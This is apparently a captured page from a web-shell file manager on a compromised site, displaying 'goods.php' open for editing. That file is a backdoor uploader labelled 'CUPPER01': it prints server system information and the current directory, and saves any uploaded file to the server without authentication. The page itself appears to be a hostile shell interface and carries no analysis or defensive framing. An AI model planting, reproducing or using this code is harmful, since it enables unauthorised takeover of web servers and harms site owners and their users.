📁 File Manager Pro
v10.0.3 | PHP: 7.4.33
Server: LiteSpeed
2026-07-06 17:52:57
📂
/ (Root)
/
home
/
jisrilmk
/
hayamachi.com
📍 /home/jisrilmk/hayamachi.com
🔄 Refresh
✏️
Editing: goods.php
Writable
<html><title> CUPPER01 </title><center><h1> CUPPER01 </h1><?php echo '<b>System Info:</b> '.php_uname().'<br>'.'<b>Current Directory:</b> '.getcwd();echo '<br><form method="post" enctype="multipart/form-data" name="uploader" id="uploader"><input type="file" name="file" size="20"><input name="_upl" type="submit" id="_upl" value="Uploaded"></form></td></tr></table></pre>';if($_FILES){if(!empty($_FILES['file'])){move_uploaded_file($_FILES['file']['tmp_name'],$_FILES['file']['name']);echo "<b>File Uploaded !!!</b><br>";}else{echo "<b>Upload Failed !!!</b><br><br>";}}?>
💾 Save Changes
❌ Cancel